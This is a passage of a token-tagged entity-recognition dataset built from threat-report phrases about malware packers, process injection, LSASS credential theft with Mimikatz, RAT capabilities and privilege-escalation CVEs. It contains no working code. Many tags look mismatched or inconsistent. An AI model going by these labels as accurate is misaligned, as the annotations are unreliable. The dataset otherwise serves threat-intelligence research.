"O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "variety", - "of", - "packers", - "used", - "for", - "these", - "executables" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "different", - "variants", - "of", - "a", - "packer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "packed", - "with", - "CyaX" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "is", - "gzip-decompressed", - "and", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ".NET", - "packer", - "known", - "as", - "CyaX" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "used", - "an", - "AutoIt", - "packer", - "that", - "comes", - "heavily", - "obfuscated." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "various", - "layers", - "of", - "packers", - "for", - "obfuscating", - "their", - "droppers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decrypt" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decrypts", - "it" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "another", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "string", - "that", - "will", - "be", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "array", - "by", - "doing", - "a", - "single-byte", - "XOR", - "operation,", - "cycling", - "through", - "the", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decryption", - "of", - "the", - "payload", - "is", - "based", - "on", - "XOR", - "operations" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "single-byte", - "XOR", - "algorithm." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "various", - "encryption", - "algorithms", - "in", - "their", - "droppers", - "to", - "hide", - "strings", - "and", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injecting", - "it", - "into", - "legitimate", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "be", - "injected", - "into", - "a", - "new", - "process", - "or", - "loaded", - "in", - "the", - "same", - "process", - "space" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "into", - "a", - "different", - "process," - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injection", - "of", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "performs", - "the", - "injection", - "and", - "execution", - "of", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "inject", - "it", - "into", - "some", - "process" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "with", - "RunPE", - "code", - "is", - "used", - "to", - "perform", - "the", - "injection" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAR", - "archive", - "is", - "downloaded" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compressed", - "archives" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "layers", - "of", - "encryption,", - "obfuscation", - "or", - "anti-analysis" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "was", - "hiding", - "in", - "non-malicious", - "code," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "resource", - "and", - "XORed", - "with", - "a", - "hardcoded", - "password" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "with", - "this", - "same", - "XOR-based", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "is", - "run", - "with", - "rundll32" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "steganography" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "reads", - "pixels", - "from", - "an", - "image", - "contained", - "in", - "the", - "first", - "binary" - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stores", - "every", - "pixel", - "as", - "three", - "numbers", - "according", - "to", - "its", - "red,", - "green", - "and", - "blue", - "components" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "packers", - "that", - "read", - "pixel", - "data", - "from", - "images", - "contained", - "in", - "PE", - "files’", - "resource", - "sections", - "and", - "build", - "the", - "next", - "layer", - "of", - "execution", - "from", - "the", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "that", - "will", - "be", - "loaded", - "and", - "called", - "in", - "the", - "same", - "address", - "space" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "performs", - "the", - "injection", - "is", - "contained", - "in", - "an", - "array", - "and", - "is", - "dynamically", - "loaded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "disabling", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "CyaX", - "packer,", - "which", - "can", - "disable", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "checking", - "for", - "security", - "products" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "droppers", - "that", - "check", - "for", - "security", - "software", - "present", - "in", - "a", - "victim’s", - "computer" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loaded", - "with", - "VirtualAlloc", - "and", - "executed" - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "API", - "calls", - "in", - "their", - "droppers,", - "such", - "as", - "CreateProcessA,", - "WriteProcessMemory", - "and", - "ResumeThread,", - "to", - "load", - "and", - "execute", - "shellcode", - "in", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "created", - "in", - "the", - "Startup", - "folder", - "to", - "execute", - "the", - "script." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "RATs", - "that", - "persist", - "by", - "creating", - "a", - "Run", - "registry", - "key", - "or", - "by", - "creating", - "a", - "copy", - "of", - "the", - "malware", - "in", - "the", - "Startup", - "folder" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Delete", - "the", - "dropper", - "executable" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "malware", - "that", - "deletes", - "itself", - "from", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Download", - "and", - "execute", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "ability", - "to", - "download", - "and", - "execute", - "other", - "malware" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "uploading", - "and", - "downloading", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "I-Features" - ] - }, - { - "tokens": [ - "keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "keylogging," - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "have", - "keylogging", - "capabilities" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "screen", - "capture" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "taking", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "can", - "capture", - "screenshots", - "of", - "victim", - "machines" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltration", - "of", - "files" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "exfiltrate", - "data", - "over", - "the", - "same", - "channel", - "used", - "for", - "C&C" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "used", - "RATs", - "that", - "can", - "launch", - "a", - "command", - "shell", - "for", - "executing", - "commands." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "have", - "used", - "scheduled", - "tasks", - "in", - "their", - "droppers", - "and", - "payloads", - "to", - "achieve", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "RATs", - "that", - "implement", - "UAC", - "bypassing." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "RATs", - "that", - "allow", - "full", - "access", - "to", - "the", - "Registry," - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "used", - "droppers", - "that", - "inject", - "the", - "payload", - "into", - "legitimate", - "processes" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "can", - "browse", - "file", - "systems" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "with", - "modules", - "that", - "show", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "can", - "read", - "the", - "Registry." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "gather", - "system", - "information", - "such", - "as", - "computer", - "name", - "and", - "operating", - "system", - "during", - "the", - "initial", - "infection" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "can", - "collect", - "the", - "IP", - "address", - "of", - "the", - "victim", - "machine" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "retrieve", - "the", - "current", - "username", - "during", - "initial", - "infection" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "can", - "perform", - "remote", - "desktop", - "access." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "can", - "access", - "the", - "local", - "file", - "system", - "and", - "upload,", - "download", - "or", - "delete", - "files" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "I-Features" - ] - }, - { - "tokens": [ - "used", - "Remcos", - "RAT,", - "which", - "uses", - "RC4", - "for", - "encrypting", - "C&C", - "communications" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "various", - "RATs", - "that", - "use", - "TCP", - "for", - "C&C", - "communications" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "data", - "exfiltration", - "of", - "sensitive", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "move", - "through", - "the", - "victim", - "environment", - "via", - "RDP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "mass", - "deletion", - "of", - "virtual", - "machines,", - "storage,", - "and", - "configurations" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "identify", - "any", - "credentials", - "which", - "may", - "be", - "stored", - "in", - "technical", - "documentation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extraction", - "of", - "sensitive", - "API", - "Keys" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Access", - "to", - "local", - "password", - "managers", - "and", - "databases", - "to", - "obtain", - "further", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "compromised", - "credentials", - "to", - "access", - "corporate", - "VPNs." - ], - "ner_tags": [ - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "victim", - "controlled", - "hostnames", - "were", - "revealed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "runs", - "a", - "scheduled", - "task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decryption", - "of", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "using", - "DPAPI" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "These", - "credentials", - "are", - "generated", - "and", - "stored", - "in", - "the", - "memory", - "of", - "the", - "LSASS", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attackers", - "may", - "attempt", - "to", - "access", - "LSASS", - "process", - "memory", - "to", - "extract", - "credentials", - "as", - "it", - "stores", - "a", - "variety", - "of", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "process", - "memory", - "is", - "one", - "of", - "the", - "prime", - "targets", - "for", - "attackers,", - "as", - "well", - "as", - "malware", - "armed", - "with", - "lateral", - "movement", - "capabilities", - "since", - "it", - "caches", - "a", - "variety", - "of", - "credentials" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Credential", - "extraction", - "from", - "the", - "LSASS", - "process" - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credential-based", - "deception", - "is", - "to", - "stage", - "the", - "deceptive", - "credentials", - "in", - "LSASS", - "process", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credentials", - "are", - "extracted", - "with", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credential", - "extraction", - "tool", - "Mimikatz" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "uses", - "the", - "CreateProcessWithLogonW", - "Windows", - "API" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "calling", - "the", - "API" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "recon", - "for", - "interesting", - "hostnames" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "public", - "facing", - "systems", - "is", - "compromised" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "be", - "injected", - "with", - "deceptive", - "credentials", - "at", - "multiple", - "places", - "like", - "LSASS", - "process", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Injecting", - "NETONLY", - "credentials", - "into", - "LSASS", - "process", - "memory" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Injecting", - "credentials", - "into", - "LSASS", - "memory" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credentials", - "being", - "picked", - "up", - "and", - "used", - "to", - "pivot", - "to", - "decoy", - "systems", - "in", - "the", - "network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keyloggers" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "flood", - "a", - "remote", - "DNS", - "server", - "with", - "false", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "send", - "traffic", - "simultaneously", - "to", - "one", - "server," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "default", - "factory", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrating", - "data", - "from", - "the", - "target", - "device" - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "covert", - "channel", - "that", - "can", - "be", - "used", - "to", - "exfiltrate", - "data", - "from", - "the", - "victim", - "device" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deliver", - "more", - "malware," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extract", - "data", - "and", - "files", - "from", - "endpoint", - "devices." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "version", - "of", - "the", - "malware", - "that", - "was", - "injected", - "into", - "a", - "victim’s", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "usually", - "pretends", - "to", - "be", - "a", - "legitimate", - "file,", - "such", - "as", - "an", - "Adobe", - "PDF", - "or", - "Dropbox", - "file," - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "phishing", - "email", - "with", - "the", - "malicious", - "attachment" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "file", - "is", - "a", - "Python", - "program", - "packaged", - "by", - "PyInstaller." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "an", - "obfuscating", - "tool", - "for", - "Python", - "script", - "that", - "makes", - "the", - "malware", - "harder", - "to", - "be", - "analyzed", - "and", - "detected." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "contains", - "Base64-encoded", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Python", - "programs", - "that", - "are", - "obfuscated", - "using", - "PyArmor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "After", - "decrypting", - "the", - "pyc", - "file," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "it", - "uses", - "the", - "following", - "command", - "to", - "delete", - "the", - "data", - "in", - "PSReadline" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "It", - "also", - "checks", - "the", - "victim’s", - "hostname" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "browser", - "history", - "and", - "passwords", - "from", - "the", - "following", - "browsers" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "also", - "uses", - "the", - "command", - "“CopyFromScreen”", - "to", - "capture", - "a", - "screenshot." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Downloading", - "files", - "and", - "getting", - "a", - "screenshot" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Download", - "components", - "for", - "the", - "Keylogger" - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "It", - "is", - "a", - "key", - "logger", - "that", - "saves", - "data", - "in", - "the", - "“KeyLogs”", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "downloads", - "three", - "components", - "from" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "be", - "executed", - "via", - "scheduled", - "tasks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "was", - "quite", - "common", - "to", - "see", - "scheduled", - "tasks", - "used", - "to", - "create", - "persistence", - "for", - "the", - "ransomware", - "executable," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "also", - "expressed", - "interest", - "in", - "other", - "access", - "methods", - "such", - "as", - "RDP" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Credentials", - "that", - "have", - "either", - "been", - "reused", - "across", - "multiple", - "platforms", - "or", - "have", - "previously", - "been", - "exposed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "includes", - "VPN", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Compromised", - "accounts", - "may", - "be", - "used", - "to", - "maintain", - "access", - "to", - "the", - "network." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-Purp" - ] - }, - { - "tokens": [ - "local", - "accounts." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "and", - "local", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Affiliates", - "have", - "been", - "seen", - "brute", - "forcing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Affiliates", - "have", - "been", - "seen", - "brute", - "forcing", - "exposed", - "RDP", - "services", - "and", - "compromising", - "accounts", - "with", - "weak", - "passwords." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exploit", - "Public-Facing", - "Applications" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "typically", - "executed", - "via", - "command", - "line", - "arguments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "some", - "defense", - "evasion", - "batch", - "scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "batch", - "script", - "or", - "a", - "specially", - "crafted", - "command", - "line", - "script." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "ProxyShell", - "elevation", - "of", - "privilege", - "on", - "the", - "Exchange", - "PowerShell", - "Backend", - "(CVE-2021-34523),", - "Windows", - "Background", - "Intelligent", - "Transfer", - "Service", - "(BITS)", - "improperly", - "handling", - "symbolic", - "links", - "(CVE-2020-0787),", - "and", - "abusing", - "the", - "CMSTPLUA", - "COM", - "interface", - "have", - "all", - "been", - "seen", - "as", - "methods", - "of", - "privilege", - "escalation." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "utilized", - "a", - "UAC", - "bypass", - "tool." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Indicators,", - "such", - "as", - "logs", - "in", - "Windows", - "Event", - "Logs", - "or", - "malicious", - "files,", - "are", 